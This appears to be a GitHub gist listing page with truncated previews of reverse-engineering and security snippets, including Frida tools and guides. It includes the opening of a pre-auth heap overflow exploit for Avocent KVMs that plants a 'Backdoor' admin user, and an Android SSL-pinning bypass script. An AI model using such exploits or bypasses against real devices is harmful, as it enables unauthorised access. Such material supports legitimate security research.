Skip to content

Instantly share code, notes, and snippets.

View apkunpacker's full-sized avatar

ApkUnpacker apkunpacker

390 followers · 41 following
View GitHub Profile
@aemmitt-ns
aemmitt-ns / asmpwn.py
Last active December 30, 2023 15:08
Remote pre-auth heap buffer overflow exploit for Avocent KVMs
import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8 = lambda x: struct.pack(">b", x)
# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
global socks # python closes out of scope sockets
port = 3211 # port is hardcoded in the binary
usernm = username.encode()
@jevinskie
jevinskie / example.txt
Created July 14, 2023 02:34
xnu-unsuspend
jevin@wombat [22:32:18] [~/code/mac/widget/xnu_unsuspend] [main *]
-> % sudo taskinfo 'Deliveries Widget'
process: "Deliveries Widget" [30145] [unique ID: 1220404]
architecture: arm64
coalition (type 0) ID: 105936
coalition (type 1) ID: 591
suspend count: 1
virtual bytes: 389.40 GB; phys_footprint bytes: 8.92 MB; phys_footprint lifetime maximum bytes: 8.92 MB
run time: 42 s
user/system time (current threads): 0.046565 s / 0.036279 s
@aemmitt-ns
aemmitt-ns / restricted.m
Created May 19, 2023 14:06
program to dump out forbidden classes and selectors in NSPredicates
// dump classes and selectors forbidden in NSPredicates
// `cc -framework Foundation -o restricted restricted.m`
#import <Foundation/Foundation.h>
#import <dlfcn.h>
int main() {
void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0);
NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses");
NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors");
NSLog(@"Restricted Selectors: %@", RestrictedSelectors());
@miticollo
miticollo / permissions.py
Created May 9, 2023 01:07
A frida agent to reset all permissions on specific app. This work is based on https://github.com/FouadRaheb/AppData.
#!/usr/bin/env python3
import json
import frida
from frida.core import Device, Session, Script, ScriptExportsSync
compiler: frida.Compiler = frida.Compiler()
compiler.on("diagnostics", lambda diag: print(f"on_diagnostics: {diag}"))
bundle: str = compiler.build('permissions.ts', compression='terser')
@miticollo
miticollo / child-gating.py
Created April 28, 2023 19:21
A gist to show an example
import threading
from frida_tools.application import Reactor
import frida
class Application:
def __init__(self):
self._stop_requested = threading.Event()
@SirionRazzer
SirionRazzer / How to use O-MVLL with WSL for Android projects.md
Created March 8, 2023 10:39

How to use O-MVLL with WSL for Android projects

  • Use this guide to integrate the O-MVLL obfuscator using WSL and command line
  • The guide has two parts, the first one explains the installation of Android build tools, the second part presents all the adjustments I needed to make to standard O-MVLL integration process (https://obfuscator.re/omvll/introduction/getting-started/). Read that 'Getting started' guide first.

Preparing the WSL for commandline Android development

Based on this article https://dev.to/halimsamy/wsl-for-developers-installing-the-android-sdk-53n9

Installing OpenJDK and Gradle

sudo apt-get update
@vadim-a-yegorov
vadim-a-yegorov / sslkeylogger.js
Last active August 6, 2023 18:11
/**
* Android, iOS (12.0-15.7.3), Linux universal SSLKEYLOG dumper.
*
* Usage:
*
* # For iOS and mac:
* rvictl -s [UDID]
* # Then open Wireshark and select rvi0
*
* # For iOS and not mac:
@aemmitt-ns
aemmitt-ns / funtime.js
Last active December 30, 2023 06:26
funtime: detailed objective-c runtime tracing. ex `python funtime.py -n Messages '-[NSRegularExpression *]'`
const typeMap = {
"c": "char",
"i": "int",
"s": "short",
"l": "long",
"q": "long long",
"C": "unsigned char",
"I": "unsigned int",
"S": "unsigned short",
@incogbyte
incogbyte / mixunpin.js
Last active May 2, 2024 07:03
Frida script to bypass common methods of sslpining Android
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);
/**
* by incogbyte
* Common functions
* thx apkunpacker, NVISOsecurity, TheDauntless
* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
* !!! THIS SCRIPT IS NOT A SILVER BULLET !!
@miticollo
miticollo / How-to-build-frida-server-for-ios.md
Last active July 19, 2024 22:19
How to build frida server for iOS jailbroken devices

Here, I'll show you how to compile Frida for both rootfull and rootless jailbreaks.

TL;DR

On Dopamine/Fugu15 Max or palera1n you can add my repo (open the link in your favorite browser on your jailbroken iDevice).

The DEBs you will install are build using the following instructions.

Update 2024-02-29